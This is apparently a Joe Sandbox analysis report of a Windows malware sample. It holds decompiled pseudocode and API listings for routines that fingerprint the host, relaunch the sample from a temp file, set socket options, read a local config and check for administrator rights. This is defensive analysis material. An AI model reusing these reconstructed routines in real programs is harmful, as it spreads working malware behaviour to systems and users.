                                                                                                                                  						_t42 = 0x4120e4;
                                                                                                                                  						__eflags =  *0x4120e4 - _t42; // 0x4120e4
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							L22:
                                                                                                                                  							_t47 = 1;
                                                                                                                                  							L11:
                                                                                                                                  							E0040DD69();
                                                                                                                                  							return _t47;
                                                                                                                                  						} else {
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						do {
                                                                                                                                  							L16:
                                                                                                                                  							_t30 =  *((intOrPtr*)(_t53 + 4));
                                                                                                                                  							_t51 =  *_t42;
                                                                                                                                  							__eflags = _t30 - 0xffffffff;
                                                                                                                                  							if(_t30 == 0xffffffff) {
                                                                                                                                  								L18:
                                                                                                                                  								_t20 = _t53 + 8; // 0x8
                                                                                                                                  								_t31 = _t20;
                                                                                                                                  								__eflags =  *_t31;
                                                                                                                                  								if( *_t31 == 0) {
                                                                                                                                  									L20:
						_t52 = _t51 + 0xc;
						__eflags = _t52;
						 *((intOrPtr*)(_t53 + 0x18))(_t52, 1);
						goto L21;
					}
					_t34 = lstrcmpA(_t51 + 0x10, _t31);
					__eflags = _t34;
					if(_t34 != 0) {
						goto L21;
					}
					goto L20;
				}
				__eflags =  *(_t51 + 0xc) - _t30;
				if( *(_t51 + 0xc) != _t30) {
					goto L21;
				}
				goto L18;
				L21:
				_t42 =  *_t42;
				__eflags =  *_t42 - 0x4120e4;
			} while ( *_t42 != 0x4120e4);
			goto L22;
		}
		_t47 = 0;
		goto L11;
	} else {
		goto L1;
	}
	do {
		L1:
		_t54 =  *_t41;
		if( *((intOrPtr*)(_t54 + 0x18)) == _a4 &&  *((intOrPtr*)(_t54 + 4)) == _a8) {
			if(_a12 != 0) {
				_t8 = _t54 + 8; // 0x761b43e8
				__eflags = lstrcmpA(_t8, _a12);
			} else {
				_t59 =  *(_t54 + 8);
			}
			if(_t59 == 0) {
				break;
			} else {
				goto L7;
			}
		}
		L7:
		_t41 =  *_t41;
		_t53 = 0;
	} while ( *_t41 != 0x4120e8);
	if(_t53 != 0) {
		goto L15;
	}
	goto L9;
}

APIs
  • Part of subcall function 0040DD05: GetTickCount.KERNEL32 ref: 0040DD0F
  • Part of subcall function 0040DD05: InterlockedExchange.KERNEL32(004136B4,00000001), ref: 0040DD44
  • Part of subcall function 0040DD05: GetCurrentThreadId.KERNEL32 ref: 0040DD53
• lstrcmpA.KERNEL32(761B43E8,00000000,?,761B43E0,00000000,?,00405EC1), ref: 0040E693
• lstrcpynA.KERNEL32(00000008,00000000,0000000F,?,761B43E0,00000000,?,00405EC1), ref: 0040E6E9
• lstrcmpA.KERNEL32(?,00000008,?,761B43E0,00000000,?,00405EC1), ref: 0040E722
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: lstrcmp$CountCurrentExchangeInterlockedThreadTicklstrcpyn
• String ID: A$ A
• API String ID: 3343386518-686259309
• Opcode ID: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
• Instruction ID: 47b803fc1c440cad9c550ff35358ad860d5bc2ca4051ff98ce99c32b6473ed9c
• Opcode Fuzzy Hash: 951ece8c2afd944643beef7ac70d50e077dd33d1a65e809f7a70b3905a3fc363
• Instruction Fuzzy Hash: CC31C031600301DBCB318F66E8847977BE4AB24314F508D3BE555A7690D779E8A0CB89
Uniqueness
                                                                                                                                  Uniqueness

Uniqueness Score: -1.00%

APIs
• setsockopt.WS2_32(00000000,0000FFFF,00000004,00000000,00000004), ref: 0040F2A0
• setsockopt.WS2_32(00000004,0000FFFF,00001005,00000004,00000004), ref: 0040F2C0
• setsockopt.WS2_32(00000004,0000FFFF,00001006,00000004,00000004), ref: 0040F2DD
• setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 0040F2EC
• setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 0040F2FD
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: setsockopt
• String ID:
• API String ID: 3981526788-0
• Opcode ID: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
• Instruction ID: 54276ff97121d9260d4f5268cf3942b14174050ddbce03adff589c8218e6c2bb
• Opcode Fuzzy Hash: 8b4be0266ee07c3102769aa2bfb0f3fbe40b153d7f42fbd5c93fb3948aedae23
• Instruction Fuzzy Hash: 6B110AB2A40248BAEF11DF94CD85FDE7FBCEB44751F008066BB04EA1D0E6B19A44CB94
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 79%
E00409145(void* __eflags) {
	char _v264;
	char _v1288;
	char* _t13;
	void* _t20;
	void* _t23;
	void* _t29;

	_t29 = __eflags;
	GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
	CharToOemA( &_v264,  &_v264);
	_t13 =  &_v264;
	_push(_t13);
	_push(_t13);
	wsprintfA( &_v1288, E00402544(0x4122f8,  &E004107A8, 0x66, 0xe4, 0xc8));
	E0040EE2A(_t23, 0x4122f8, 0, 0x100);
	_t20 = E00409064(_t29,  &_v1288,  &_v264);
	if(_t20 != 0) {
		return ShellExecuteA(0, 0,  &_v264, 0, 0, 0);
	}
	return _t20;
}

APIs
• GetModuleHandleA.KERNEL32(00000000,?,00000104,00000100,004122F8), ref: 0040915F
• GetModuleFileNameA.KERNEL32(00000000), ref: 00409166
• CharToOemA.USER32 ref: 00409174
• wsprintfA.USER32 ref: 004091A9
  • Part of subcall function 00409064: GetTempPathA.KERNEL32(00000400,?,00000000,004122F8), ref: 0040907B
  • Part of subcall function 00409064: wsprintfA.USER32 ref: 004090E9
  • Part of subcall function 00409064: CreateFileA.KERNEL32(004122F8,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040910E
  • Part of subcall function 00409064: lstrlenA.KERNEL32(00000000,00000100,00000000), ref: 00409122
  • Part of subcall function 00409064: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040912D
  • Part of subcall function 00409064: CloseHandle.KERNEL32(00000000), ref: 00409134
• ShellExecuteA.SHELL32(00000000,00000000,?,00000000,00000000,00000000), ref: 004091E1
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Similarity
• API ID: File$HandleModulewsprintf$CharCloseCreateExecuteNamePathShellTempWritelstrlen
• String ID:
• API String ID: 3857584221-0
• Opcode ID: 94b6a3cd4bae5339fb675e52ca0e10f722d210c4c3e56ae61748716d573fc5c2
• Instruction ID: 6acb945c628b875356ea86accac8c7b18cb61426f44bb7d0566a1afba52fbd3a
• Opcode Fuzzy Hash: 94b6a3cd4bae5339fb675e52ca0e10f722d210c4c3e56ae61748716d573fc5c2
• Instruction Fuzzy Hash: 8F016DB69001187BD720A7619D49EDF3A7C9B85705F0000A6BB09E2080DAB89AC48F68
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
		// Looks up the key _a12 in a buffer (_a4, length _a8) of alternating
		// NUL-terminated key/value strings; returns a pointer to the matching
		// value, or 0 when the key is not found before the end of the buffer.
		E00402419(void* __ecx, CHAR* _a4, intOrPtr _a8, CHAR* _a12) {
			int _v8;
			int _t18;
			intOrPtr _t20;
			CHAR* _t21;
			int _t30;
			CHAR* _t36;

			_t18 = lstrlenA(_a12);
			_t36 = _a4;
			_v8 = _t18;
			_t20 = _a8 + _t36;
			_a8 = _t20;
			if(_t36 >= _t20) {
				L5:
				_t21 = 0;
			} else {
				while(1) {
					_t30 = lstrlenA(_t36);
					_t7 =  &(_t36[1]); // 0x1
					_a4 = _t30 + _t7;
					if(_v8 == _t30 && lstrcmpiA(_t36, _a12) == 0 && _a4 < _a8) {
						break;
					}
					_t36 =  &(_t36[lstrlenA(_a4) + _t30 + 2]);
					if(_t36 < _a8) {
						continue;
					} else {
						goto L5;
					}
					goto L6;
				}
				_t21 = _a4;
			}
			L6:
			return _t21;
		}
APIs
• lstrlenA.KERNEL32(?,localcfg,?,00000000,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001), ref: 00402429
• lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 0040243E
• lstrcmpiA.KERNEL32(?,?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg), ref: 00402452
• lstrlenA.KERNEL32(?,?,00402491,?,?,?,0040E844,-00000030,?,?,?,00000001,00401E3D,00000001,localcfg,lid_file_upd), ref: 00402467
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Similarity
• API ID: lstrlen$lstrcmpi
• String ID: localcfg
• API String ID: 1808961391-1857712256
• Opcode ID: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
• Instruction ID: 10b525c6ae3f8891cd48fd25e34f392daf9ed257baad57177c8ccf48abf1fcea
• Opcode Fuzzy Hash: e0652b8e6b882c26303073c97bc729d70adad1496f82cefeb83b9b40d862f6ea
• Instruction Fuzzy Hash: B4011A31600218EFCF11EF69DD888DE7BA9EF44354B01C436E859A7250E3B4EA408A98
Uniqueness
Uniqueness Score: -1.00%
Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: __aulldiv__aullrem_get_int64_arg
• String ID: 9
• API String ID: 3120068967-2366072709
• Opcode ID: 9bd7b0dc4f59437fa338d34710ca8e2c81e896d95e6ef907c3f8ae10e9d6a8c9
• Instruction ID: 509e828b3008e3aab81c55c070a8947765e217c103e4db72dccbab3868dfdeb3
• Opcode Fuzzy Hash: 9bd7b0dc4f59437fa338d34710ca8e2c81e896d95e6ef907c3f8ae10e9d6a8c9
• Instruction Fuzzy Hash: 614125F0E001299FDB64CF49D881BAEB7B4FF85314F40419AE188AB240C7785E85CF5A
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: __aulldiv__aullrem_get_int64_arg
• String ID: 9
• API String ID: 3120068967-2366072709
• Opcode ID: 61246dd1e5bb9ccefb6228f064231130c087d5401c6c3a0fea95b2c5d12e6320
• Instruction ID: d1c1bcbb0fab2d3620b9ffaf9ec68e89214f902ffa806ae79501c52aa73867b1
• Opcode Fuzzy Hash: 61246dd1e5bb9ccefb6228f064231130c087d5401c6c3a0fea95b2c5d12e6320
• Instruction Fuzzy Hash: 304106F1E001299FEF64CF49D881BAEB7B5FB85314F4445AAE188AB241C7385E81CF59
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: __aulldiv__aullrem_get_int64_arg
• String ID: 9
• API String ID: 3120068967-2366072709
• Opcode ID: 75c292081e2062ca91706fb0122c83371ae2ef76ec994ce6af73df16e36eddb2
• Instruction ID: 42106033806ea7bb90f00517d68dc85ba1b5828fe851184c900f6de1efba4c70
• Opcode Fuzzy Hash: 75c292081e2062ca91706fb0122c83371ae2ef76ec994ce6af73df16e36eddb2
• Instruction Fuzzy Hash: ED41E2B1E05629DFEB24CF58DC89BAEB7B5FB84304F64859AD049A7240C7789E80CF44
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: _get_int64_arg$__aulldiv__aullrem
• String ID: 9
• API String ID: 2124759748-2366072709
• Opcode ID: a4405a0418a309f27a5e5bf6895064569a008f80a4daf4c408bae2a5a01e09e0
• Instruction ID: 6145f39c6fd3fe5de38c2efc57b572788e451d6dd513c70c114c2fbd8dd523f2
• Opcode Fuzzy Hash: a4405a0418a309f27a5e5bf6895064569a008f80a4daf4c408bae2a5a01e09e0
• Instruction Fuzzy Hash: 2341E5B1E05228DFDB24CF58D889BAEB7B5BB85304F6481DAD009A7240C7789E80CF45
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000D.00000002.284699476.0000000000415000.00000020.00000001.01000000.00000004.sdmp, Offset: 00415000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_415000_pjzcupje.jbxd
Similarity
• API ID: _get_int64_arg$__aulldiv__aullrem
• String ID: 9
• API String ID: 2124759748-2366072709
• Opcode ID: 8b06dbf1418790fe7afe7a6ed779bba85cdcfbb89dc6132216bc6d4adfe29cb4
• Instruction ID: afea4893869f5e44770ec48f1c12b1aa2fdc6b311f9b05f0b74501ba197f70af
• Opcode Fuzzy Hash: 8b06dbf1418790fe7afe7a6ed779bba85cdcfbb89dc6132216bc6d4adfe29cb4
• Instruction Fuzzy Hash: 8B4126F1E001299FDB64CF49D881BAEB7B4BB85314F4045DAE288A7201C7385E81CF1A
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                  			E00401AC3() {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				char _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				struct HINSTANCE__* _t19;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				intOrPtr* _t28;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				void* _t41;
                                                                                                                                  				intOrPtr _t43;
                                                                                                                                  
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_t19 = LoadLibraryA("Iphlpapi.dll");
                                                                                                                                  				if(_t19 == 0) {
                                                                                                                                  					L15:
                                                                                                                                  					return _v16;
                                                                                                                                  				}
                                                                                                                                  				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
                                                                                                                                  				if(_t28 == 0) {
                                                                                                                                  					L14:
                                                                                                                                  					goto L15;
                                                                                                                                  				}
                                                                                                                                  				_push( &_v12);
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_push(0);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t41 =  *_t28(2, 0, 0);
                                                                                                                                  					if(_t41 != 0x6f) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t24 = E0040EBED(_v8, _v12);
                                                                                                                                  					if(_t24 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_push( &_v12);
                                                                                                                                  					_v8 = _t24;
                                                                                                                                  					_push(_t24);
                                                                                                                                  				}
                                                                                                                                  				if(_t41 != 0) {
                                                                                                                                  					L11:
                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                  						E0040EC2E(_v8);
                                                                                                                                  					}
                                                                                                                                  					L13:
                                                                                                                                  					goto L14;
                                                                                                                                  				}
                                                                                                                                  				_t26 = _v8;
                                                                                                                                  				if(_t26 == 0) {
                                                                                                                                  					goto L13;
                                                                                                                                  				} else {
                                                                                                                                  					goto L8;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					L8:
                                                                                                                                  					_t43 =  *((intOrPtr*)(_t26 + 0x34));
                                                                                                                                  					_t39 = 0;
                                                                                                                                  					if(_t43 <= 0) {
                                                                                                                                  						goto L10;
                                                                                                                                  					} else {
                                                                                                                                  						goto L9;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						L9:
                                                                                                                                  						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
                                                                                                                                  						_t39 = _t39 + 1;
                                                                                                                                  					} while (_t39 < _t43);
                                                                                                                                  					L10:
                                                                                                                                  					_t26 =  *((intOrPtr*)(_t26 + 8));
                                                                                                                                  				} while (_t26 != 0);
                                                                                                                                  				goto L11;
                                                                                                                                  			}

APIs
• LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
• GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
Strings
Memory Dump Source
• Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetAdaptersAddresses$Iphlpapi.dll
• API String ID: 2574300362-1087626847
• Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
• Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
• Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
• Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%
E00408CEE() {
	intOrPtr* _v8;
	intOrPtr _v12;
	long _t15;
	char _t17;
	intOrPtr _t19;
	intOrPtr* _t20;
	void* _t25;
	signed int _t31;
	signed char _t35;
	signed int _t36;
	char* _t41;
	intOrPtr* _t42;
	signed int _t45;
	void* _t49;

	_push(_t34);
	_t31 = 0;
	_t49 =  *0x413380 - _t31; // 0x0
	if(_t49 == 0) {
		L17:
		return _t15;
	}
	_t15 = GetTickCount() -  *0x413388;
	if(_t15 < 0xea60) {
		goto L17;
	}
	_t41 =  *0x413380; // 0x0
	_t17 =  *_t41;
	_t45 =  *(_t41 + 1);
	_t42 = _t41 + 5;
	_v12 = _t17;
	if(_t17 <= 0) {
		L16:
		_t15 = GetTickCount();
		 *0x413388 = _t15;
		goto L17;
	} else {
		_v8 = _t42;
		do {
			_t35 =  *_v8;
			if(_t35 != 8) {
				if(_t35 != 9) {
					_t36 = _t35;
					_t19 =  *((intOrPtr*)(0x413300 + _t36 * 4));
					if(_t19 == 0) {
						goto L12;
					}
					_t9 = _t19 + 0x34; // 0x3b10c483
					if(_t36 ==  *_t9) {
						_t13 = _t19 + 0x50; // 0x7486850
						_t20 =  *_t13;
						if(_t20 != 0) {
							 *_t20(_t45 >>  *(_t31 * 5 + _t42) & 0x00000001);
						}
						goto L16;
					}
					goto L12;
				}
				_t25 = E0040A688(_t45 >> _t35 & 0x00000001);
				L8:
				if(_t25 != 0) {
					_t6 = _v8 + 1; // 0x3cc6
					_t45 = _t45 |  *_t6;
                                                                                                                                  							}
                                                                                                                                  							goto L12;
                                                                                                                                  						}
                                                                                                                                  						_t25 = E0040A677(_t45 >> _t35 & 0x00000001);
                                                                                                                                  						goto L8;
                                                                                                                                  						L12:
                                                                                                                                  						_v8 = _v8 + 5;
                                                                                                                                  						_t31 = _t31 + 1;
                                                                                                                                  					} while (_t31 < _v12);
                                                                                                                                  					goto L16;
                                                                                                                                  				}
                                                                                                                                  			}
                                                                                                                                  0x00408cf2
                                                                                                                                  0x00408cf4
                                                                                                                                  0x00408cf6
                                                                                                                                  0x00408cfc
                                                                                                                                  0x00408dae
                                                                                                                                  0x00408db0
                                                                                                                                  0x00408db0
                                                                                                                                  0x00408d08
                                                                                                                                  0x00408d13
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d1b
                                                                                                                                  0x00408d21
                                                                                                                                  0x00408d24
                                                                                                                                  0x00408d27
                                                                                                                                  0x00408d2a
                                                                                                                                  0x00408d2f
                                                                                                                                  0x00408da1
                                                                                                                                  0x00408da1
                                                                                                                                  0x00408da8
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d31
                                                                                                                                  0x00408d31
                                                                                                                                  0x00408d34
                                                                                                                                  0x00408d37
                                                                                                                                  0x00408d3c
                                                                                                                                  0x00408d50
                                                                                                                                  0x00408d6c
                                                                                                                                  0x00408d6f
                                                                                                                                  0x00408d78
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7a
                                                                                                                                  0x00408d7d
                                                                                                                                  0x00408d8b
                                                                                                                                  0x00408d8b
                                                                                                                                  0x00408d90
                                                                                                                                  0x00408d9e
                                                                                                                                  0x00408da0
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d90
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7d
                                                                                                                                  0x00408d5a
                                                                                                                                  0x00408d5f
                                                                                                                                  0x00408d62
                                                                                                                                  0x00408d67
                                                                                                                                  0x00408d67
                                                                                                                                  0x00408d67
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d62
                                                                                                                                  0x00408d46
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d7f
                                                                                                                                  0x00408d7f
                                                                                                                                  0x00408d83
                                                                                                                                  0x00408d84
                                                                                                                                  0x00000000
                                                                                                                                  0x00408d89

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 536389180-2166502722
                                                                                                                                  • Opcode ID: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction ID: 1ef816322ecc1e041cdf399b9b138f6358d408137adc4a714cdb07e14db9ba06
                                                                                                                                  • Opcode Fuzzy Hash: f778bec48d6853c61bba66ff70abee8b380bd23c812c2bd80f901189d0bf267b
                                                                                                                                  • Instruction Fuzzy Hash: 0821C631610115AFCB109F64DE8169ABBB9EF20311B25427FD881F72D1DF38E940875C
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl, xrefs: 0040C057
                                                                                                                                  • 0 v, xrefs: 0040BFD0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTickwsprintf
                                                                                                                                  • String ID: Type = %d: works = %d cur_thr = %d num_thr = %d integr = %d integr_nl = %d fCntrl = %d time_ok_filt = %d cntr = %d time_nl_filt = %d last_time_work = %d last_time_getem = %d last_time_calc = %d last_time_nl$0 v
                                                                                                                                  • API String ID: 2424974917-2279882658
                                                                                                                                  • Opcode ID: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction ID: 59a0723085258e1b6130595cff45262f63c8180c8ffe05f2a9b9c441a6a96c57
                                                                                                                                  • Opcode Fuzzy Hash: 06c76dfdee32e392c5b9e14bf2ce1b6ffedea00b213a31f1363bbf4a57a4f60a
                                                                                                                                  • Instruction Fuzzy Hash: 53115672200100FFDB529BA9DD44E567FA6FB88319B3491ACF6188A166D633D863EB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                  			E00401BDF() {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				void* _v27;
                                                                                                                                  				char _v28;
                                                                                                                                  				void* _t14;
                                                                                                                                  				signed int _t21;
                                                                                                                                  				signed int _t30;
                                                                                                                                  				void* _t31;
                                                                                                                                  
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosw");
                                                                                                                                  				_t30 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				asm("stosb");
                                                                                                                                  				_v8 = 0xf;
                                                                                                                                  				_t14 = E00401AC3();
                                                                                                                                  				if(_t14 == 0) {
                                                                                                                                  					if(GetComputerNameA( &_v28,  &_v8) == 0) {
                                                                                                                                  						L6:
                                                                                                                                  						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
                                                                                                                                  						return _v12;
                                                                                                                                  					}
                                                                                                                                  					_t21 = 0;
                                                                                                                                  					if(_v8 <= 0) {
                                                                                                                                  						goto L6;
                                                                                                                                  					} else {
                                                                                                                                  						goto L3;
                                                                                                                                  					}
                                                                                                                                  					do {
                                                                                                                                  						L3:
                                                                                                                                  						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
                                                                                                                                  						_t21 = _t21 + 1;
                                                                                                                                  					} while (_t21 < _v8);
                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                  						goto L6;
                                                                                                                                  					}
                                                                                                                                  					return _t30;
                                                                                                                                  				}
                                                                                                                                  				return _t14;
                                                                                                                                  			}
                                                                                                                                  0x00401bec
                                                                                                                                  0x00401bf2
                                                                                                                                  0x00401bf3
                                                                                                                                  0x00401bf4
                                                                                                                                  0x00401bf5
                                                                                                                                  0x00401bf7
                                                                                                                                  0x00401bf9
                                                                                                                                  0x00401bfc
                                                                                                                                  0x00401bfd
                                                                                                                                  0x00401c04
                                                                                                                                  0x00401c0b
                                                                                                                                  0x00401c1d
                                                                                                                                  0x00401c45
                                                                                                                                  0x00401c51
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c57
                                                                                                                                  0x00401c1f
                                                                                                                                  0x00401c24
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c26
                                                                                                                                  0x00401c26
                                                                                                                                  0x00401c35
                                                                                                                                  0x00401c37
                                                                                                                                  0x00401c38
                                                                                                                                  0x00401c3f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00401c41
                                                                                                                                  0x00401c5e

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
                                                                                                                                    • Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9
                                                                                                                                  • GetComputerNameA.KERNEL32 ref: 00401C15
                                                                                                                                  • GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.284660265.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_pjzcupje.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressComputerInformationLibraryLoadNameProcVolume
                                                                                                                                  • String ID: hi_id$localcfg
                                                                                                                                  • API String ID: 2777991786-2393279970
                                                                                                                                  • Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                                                                  • Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
                                                                                                                                  • Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
                                                                                                                                  • Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                  			// Cached "is the caller an administrator?" check; the global at 0x412048 starts at -1 (not yet evaluated).
                                                                                                                                  			E00406EDD() {
                                                                                                                                  				int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				short _v16;
                                                                                                                                  				struct _SID_IDENTIFIER_AUTHORITY _v20;
                                                                                                                                  				signed int _t12;
                                                                                                                                  				int _t15;
                                                                                                                                  				int* _t16;
                                                                                                                                  
